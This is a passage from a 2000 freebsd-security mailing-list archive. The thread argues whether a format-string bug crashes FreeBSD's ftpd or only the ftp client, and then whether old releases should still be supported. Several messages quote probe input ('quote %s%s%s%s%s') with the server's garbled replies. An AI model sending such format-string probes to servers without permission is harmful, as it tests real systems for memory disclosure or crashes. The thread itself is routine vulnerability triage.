dead branch, 2.x even more so. > >People are still running it 3.x, though. LOTS of people. Doesn't change the fact that it's a dead branch. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11:57:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id EFC5137B503 for ; Mon, 2 Oct 2000 11:57:55 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA08021; Mon, 2 Oct 2000 12:57:37 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002125514.00d13f00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 12:57:26 -0600 To: James Wyatt From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James: You're right! The message is coming from the client (which is good). However, the client is quite fragile (which is NOT good). I don't know if it is possible to exploit the client from a hostile server or not. --Brett At 12:48 PM 10/2/2000, James Wyatt wrote: >Uh, Brett the FreeBSD and Linux ftpd differ a *lot*! You'll get more mail. > >That aside, this segfaults the client on the command line. Read my lips, >"no new privelages". (Like most of the Pine bugs discussed earlier. (^_^) > >It's even easier to duplicate than the original post. You can do it on a >failed login and needs only one %s to coredump..... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12: 0:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 03CCE37B503 for ; Mon, 2 Oct 2000 12:00:38 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92J0ZI03754; Mon, 2 Oct 2000 13:00:36 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA13720; Mon, 2 Oct 2000 13:00:35 -0600 (MDT) Message-Id: <200010021900.NAA13720@harmony.village.org> To: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 12:33:47 MDT." <4.3.2.7.2.20001002123113.049344d0@localhost> References: <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> Date: Mon, 02 Oct 2000 13:00:35 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002123113.049344d0@localhost> Brett Glass writes: : At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: : : >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 : >and 4.1[.1] don't seem affected. : : It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions : I have tested. Then why doesn't work with the 3.2 ftpd that I just tested? This bug was fixed a long time ago. Are you sure you aren't running wu-ftpd? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:15:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id D1FD437B502 for ; Mon, 2 Oct 2000 12:15:23 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e92JEgU59850; Mon, 2 Oct 2000 12:14:44 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Message from Brett Glass of "Mon, 02 Oct 2000 12:18:25 MDT." <4.3.2.7.2.20001002113441.04932240@localhost> Date: Mon, 02 Oct 2000 12:14:40 -0700 Message-ID: <59846.970514080@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen > I administer, and have been wondering why. Perhaps this message explains > it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch > up until at least 3.4-RELEASE (maybe later). That's the client crashing, you knob. Read the advisories more closely. What linux ftp clients do is not all that urgent a concern of ours. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:29:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id D8D5737B502 for ; Mon, 2 Oct 2000 12:29:50 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA08344; Mon, 2 Oct 2000 13:29:25 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002125825.00de8f00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 13:28:39 -0600 To: Alex Charalabidis From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20001002123113.049344d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:51 PM 10/2/2000, Alex Charalabidis wrote: >Yes it does. It was posted to bugtraq as a proftpd bug on 25 Jul 00 by >Carlos Eduardo Gorges . I confirmed the bug existed on >our 6.00LS too (and promptly forgot :P). As far as I know, there have been >no exploits and it's not even a DoS since the parent process is >unaffected. The default FreeBSD ftp client crashes before the server >process does, so you can only see the problem with a client on a different >OS (oddly enough, the MS-DOS 7 client seems to be the only one that >creates no problems at all). Interesting. It appears that my earlier tests were not conclusive because there were problems in both the server AND the client. Thank you for pointing this out! Let's try testing the server with the MS-DOS 7 client, so that any problems with the FreeBSD FTP client are not a factor. I am now using the MS-DOS 7 client and connecting to a FreeBSD 4.1+ server (running FreeBSD 4.1-20000916-STABLE). Here's what I see from the client side: ftp> quote %s%s%s%s%s 500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood. This means that while the FreeBSD FTP client crashed (and generated the segfault message), the server did not crash. However, there's still junk in the message sent back by the server, which indicates that I may be getting at the stack here. What's more, when I do a ps -ax on the server, I see (user and host names changed): 19119 ?? Is 0:00.05 ftpd: host.com: user: \M-8H|\^Cx\M-C\M-8\M-`y\^Cx\M-C\M-8|\^Tquote %s%s%s%s%s(null)%s%s%s%s%s\ Oops! We've got a bit of weirdness on the server side too, though it did not crash. Can this be exploited? Now, let's send a command with more %s format directives to the server: ftp> quote %s%s%s%s%s%s%s%s%s%s (Nothing) The ftpd process on the server is alive but seems to be hung parsing the command. So, something is amiss, but to what extent it is exploitable I can't tell. It DOES happen even in 4.1, though. Haven't looked into why the FreeBSD clients from FreeBSD 3.4 and prior crashed. So, I cannot tell as yet whether a hostile server can do nasty things to them or not. --Brett --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:30:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id D2E7637B503 for ; Mon, 2 Oct 2000 12:30:43 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (1297 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 14:22:43 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 14:22:24 -0500 (CDT) From: James Wyatt To: Poul-Henning Kamp Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <21498.970512887@critter> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes: > >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: > > > >>3.4 is a dead branch, 2.x even more so. > > > >People are still running it 3.x, though. LOTS of people. > > Doesn't change the fact that it's a dead branch. Doesn't change the fact that "LOTS of people" are still running it... Geez, what a curt, rude, throw-your-hands-up answer. Are you saying that if we found a terrible bug (not this easy one) somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:33:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id A327237B66C for ; Mon, 2 Oct 2000 12:33:09 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e92JX0N21972; Mon, 2 Oct 2000 21:33:00 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: James Wyatt Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Your message of "Mon, 02 Oct 2000 14:22:24 CDT." Date: Mon, 02 Oct 2000 21:33:00 +0200 Message-ID: <21970.970515180@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Jam es Wyatt writes: >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: >> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes: >> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: >> > >> >>3.4 is a dead branch, 2.x even more so. >> > >> >People are still running it 3.x, though. LOTS of people. >> >> Doesn't change the fact that it's a dead branch. > >Doesn't change the fact that "LOTS of people" are still running it... >Geez, what a curt, rude, throw-your-hands-up answer. > >Are you saying that if we found a terrible bug (not this easy one) >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ Yes, I am saying that. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:37:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 8811737B66D for ; Mon, 2 Oct 2000 12:37:35 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA08439; Mon, 2 Oct 2000 13:37:12 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002133032.00dfb540@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 13:35:12 -0600 To: Warner Losh From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG In-Reply-To: <200010021900.NAA13720@harmony.village.org> References: <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner: There's a problem with bugs in some of the clients, and it's obscuring problems in the server! See my most recent message to Alex Charalabidi. --Brett At 01:00 PM 10/2/2000, Warner Losh wrote: >In message <4.3.2.7.2.20001002123113.049344d0@localhost> Brett Glass writes: >: At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: >: >: >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 >: >and 4.1[.1] don't seem affected. >: >: It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions >: I have tested. > >Then why doesn't work with the 3.2 ftpd that I just tested? This bug >was fixed a long time ago. Are you sure you aren't running wu-ftpd? > >Warner > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:39:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id EE58C37B503 for ; Mon, 2 Oct 2000 12:39:29 -0700 (PDT) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with SMTP id XAA02785; Mon, 2 Oct 2000 23:39:02 +0400 (MSD) Date: Mon, 2 Oct 2000 23:39:02 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Brett Glass Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002123113.049344d0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Please stop it. This is ftp (NOT FTPD) bug in earler versions of FreeBSD. I've send bug report about six month ago and it was fixed. I repeat again, it's NOT ftpd bug. it's ftp client bug. And it was fixed about six month ago. cvsup (or upgrade) is Your friend. Dmitry. On Mon, 2 Oct 2000, Brett Glass wrote: > Date: Mon, 02 Oct 2000 12:33:47 -0600 > From: Brett Glass > To: "Chris D . Faulhaber" > Cc: security@FreeBSD.ORG > Subject: Re: ftpd bug in FreeBSD through at least 3.4 > > At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote: > > >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 > >and 4.1[.1] don't seem affected. > > It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions > I have tested. > > --Brett > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:39:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 54E3437B502 for ; Mon, 2 Oct 2000 12:39:44 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e92JdgI03924; Mon, 2 Oct 2000 13:39:43 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA14026; Mon, 2 Oct 2000 13:39:42 -0600 (MDT) Message-Id: <200010021939.NAA14026@harmony.village.org> To: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: "Chris D . Faulhaber" , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 13:35:12 MDT." <4.3.2.7.2.20001002133032.00dfb540@localhost> References: <4.3.2.7.2.20001002133032.00dfb540@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> <4.3.2.7.2.20001002113441.04932240@localhost> Date: Mon, 02 Oct 2000 13:39:42 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001002133032.00dfb540@localhost> Brett Glass writes: : There's a problem with bugs in some of the clients, and it's obscuring : problems in the server! See my most recent message to Alex Charalabidi. Right. I was using a known good client :-) 4.1.1's client doesn't core dump either. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:43:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from fyre.somcol.co.za (fyre.somcol.co.za [196.30.167.130]) by hub.freebsd.org (Postfix) with ESMTP id 7BF6A37B503 for ; Mon, 2 Oct 2000 12:43:17 -0700 (PDT) Received: from localhost (jus@localhost) by fyre.somcol.co.za (8.9.3/8.9.3) with ESMTP id VAA60664; Mon, 2 Oct 2000 21:42:27 +0200 (SAST) (envelope-from jus@security.za.net) X-Authentication-Warning: fyre.somcol.co.za: jus owned process doing -bs Date: Mon, 2 Oct 2000 21:42:27 +0200 (SAST) From: Justin Stanford X-Sender: jus@fyre.somcol.co.za To: Brett Glass Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002125825.00de8f00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I tried using ncftp2 to eradicate any bugs in 'ftp' that may be obscuring problems with 'ftpd'. >=20 > ftp> quote %s%s%s%s%s > 500 '+H|X++_YX++|=B6QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not unders= tood. Same response. > quote %s%s%s%s%s '%S%S%S%S%S': command not understood. > Now, let's send a command with more %s format directives to the server: >=20 > ftp> quote %s%s%s%s%s%s%s%s%s%s > (Nothing) >=20 > The ftpd process on the server is alive but seems to be hung parsing the = command. > So, something is amiss, but to what extent it is exploitable I can't tell= =2E > It DOES happen even in 4.1, though. > quote %s%s%s%s%s%s%s%s%s%s '%S%S%S%S%S%S%S%S%S%S': command not understood. Not so here.. a perfectly normal response. This is ftp'ing to localhost on 4.0-STABLE... I can then proceed normally with ftp'ing aswell - the server does not hang. Regards, jus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:44:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 1401037B503 for ; Mon, 2 Oct 2000 12:44:54 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id NAA07443; Mon, 2 Oct 2000 13:44:23 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id NAA18121; Mon, 2 Oct 2000 13:44:22 -0600 (MDT) (envelope-from nate) Date: Mon, 2 Oct 2000 13:44:22 -0600 (MDT) Message-Id: <200010021944.NAA18121@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Poul-Henning Kamp Cc: James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <21970.970515180@critter> References: <21970.970515180@critter> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >> >>3.4 is a dead branch, 2.x even more so. > >> > > >> >People are still running it 3.x, though. LOTS of people. > >> > >> Doesn't change the fact that it's a dead branch. > > > >Doesn't change the fact that "LOTS of people" are still running it... > >Geez, what a curt, rude, throw-your-hands-up answer. > > > >Are you saying that if we found a terrible bug (not this easy one) > >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ > > Yes, I am saying that. FWIW, I agree with Poul. We don't have the resources to support anything but '-stable', so if have an older release and need a bug-fix, you're forced to support yourself (ie; provide a bug-fix on your own), or you must upgrade to the most recent '-stable' bits. For those of you with more of a clue, it's not that difficult to support older versions of FreeBSD. For example, a firewall at my old employer is still running FreeBSD 2.2.8-stable, and aside from local exploits, the box is both stable and pretty dang secure. All code (userland and kernel) with known remote exploits have either been upgraded (sendmail, BIND, etc...), or the kernel modifications have been merged in and/or ported back to FreeBSD 2.2 by myself from newer releases. Since I'm no longer with the company, it hasn't been as actively maintained, but on the flip side, it hasn't needed much maintainence. I still keep in contact with the current sys-ad, and if a problem that effects him comes up, I'll let him know. Who knows, he might hire me to fix the bug. :) :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:45:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 58CFF37B66C for ; Mon, 2 Oct 2000 12:45:46 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA08546; Mon, 2 Oct 2000 13:45:34 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002133527.00d604a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 13:43:33 -0600 To: Jordan Hubbard From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: security@FreeBSD.ORG In-Reply-To: <59846.970514080@winston.osd.bsdi.com> References: <4.3.2.7.2.20001002113441.04932240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:14 PM 10/2/2000, Jordan Hubbard wrote: >That's the client crashing, you knob. Read the advisories more closely. >What linux ftp clients do is not all that urgent a concern of ours. Jordan: Alas, there is still reason for concern. Here's why: 1) At least some FreeBSD clients are also crashing in the same way as the Linux client described in that message. They're segfaulting, which means they could be susceptible to attacks from malicious servers. 2) There is still some funkiness in recent FreeBSD servers too. This is evidenced by the fact that bad commands can generate responses which look like a memory dump. They also mess up the output of ps(1). See my message a few minutes ago to Alex, which shows problems in the server when I submit bad commands using the MS-DOS/Windows client. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:51:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com [207.46.181.28]) by hub.freebsd.org (Postfix) with ESMTP id A60BC37B502 for ; Mon, 2 Oct 2000 12:51:17 -0700 (PDT) Received: from x86nts4 - 216.103.48.12 by email.msn.com with Microsoft SMTPSVC; Mon, 2 Oct 2000 12:48:43 -0700 Message-ID: <036301c02caa$ebc17300$fd01a8c0@pacbell.net> From: "John Howie" To: "James Wyatt" , "Poul-Henning Kamp" Cc: "Brett Glass" , "Chris D . Faulhaber" , References: <21970.970515180@critter> Subject: Re: ftpd bug in FreeBSD through at least 3.4 Date: Mon, 2 Oct 2000 12:56:56 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "Poul-Henning Kamp" To: "James Wyatt" Cc: "Brett Glass" ; "Chris D . Faulhaber" ; Sent: Monday, October 02, 2000 12:33 PM Subject: Re: ftpd bug in FreeBSD through at least 3.4 > In message , Jam > es Wyatt writes: > >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > >> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes: > >> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: > >> > > >> >>3.4 is a dead branch, 2.x even more so. > >> > > >> >People are still running it 3.x, though. LOTS of people. > >> > >> Doesn't change the fact that it's a dead branch. > > > >Doesn't change the fact that "LOTS of people" are still running it... > >Geez, what a curt, rude, throw-your-hands-up answer. > > > >Are you saying that if we found a terrible bug (not this easy one) > >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ > > Yes, I am saying that. ^^^^^^^^^^^^^^^^^^^^^ And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported pay-for-use Operating System like Windows in the eyes of real-world business-critical system administrators and CIOs. Of course, all the egos, moaning, and bitching don't help either. Yours in disgust, John Howie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:54:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id D369F37B503 for ; Mon, 2 Oct 2000 12:54:32 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id PAA672352; Mon, 2 Oct 2000 15:54:28 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200009300023.e8U0NUW20137@earth.backplane.com> References: <200009300023.e8U0NUW20137@earth.backplane.com> Date: Mon, 2 Oct 2000 15:54:25 -0400 To: Matt Dillon , freebsd-security@FreeBSD.ORG From: Garance A Drosihn Subject: Re: Proposed minor mod to openssh for interactive operation Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 5:23 PM -0700 9/29/00, Matt Dillon wrote: > At the moment openssh only turns on TCP_NODELAY etc if it > thinks you are creating an interactive shell, based on > whether it allocates a pty or not. > > Unfortunately, I have an application (and I expect this > would be useful generally) which uses a ssh link between > two programs interactively. > That is, send command, wait response, send command, wait > response. Delaying packets is a bad idea and cuts > performance over the link by about 20%. Would it be more appropriate to use stunnel (in ports) instead of an ssh connection for your application? (I'm just wondering...) --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 12:56:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id AF38237B503 for ; Mon, 2 Oct 2000 12:56:15 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e92Ju2N23685; Mon, 2 Oct 2000 21:56:02 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "John Howie" Cc: "James Wyatt" , "Brett Glass" , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Your message of "Mon, 02 Oct 2000 12:56:56 PDT." <036301c02caa$ebc17300$fd01a8c0@pacbell.net> Date: Mon, 02 Oct 2000 21:56:02 +0200 Message-ID: <23683.970516562@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <036301c02caa$ebc17300$fd01a8c0@pacbell.net>, "John Howie" writes: >> >Are you saying that if we found a terrible bug (not this easy one) >> >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ >> >> Yes, I am saying that. > ^^^^^^^^^^^^^^^^^^^^^ > >And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported >pay-for-use Operating System like Windows in the eyes of real-world >business-critical system administrators and CIOs. Of course, all the egos, >moaning, and bitching don't help either. Send me private email, and I'll send you my pricelist. Once you've taken you pick there, we are competing on level ground. Until you do you're asking me to waste my spare time because you cannot be bothered to upgrade your system to recent releases. Feel free to estimate my enthusiasm for your problem. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 13: 1:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 56B6837B502 for ; 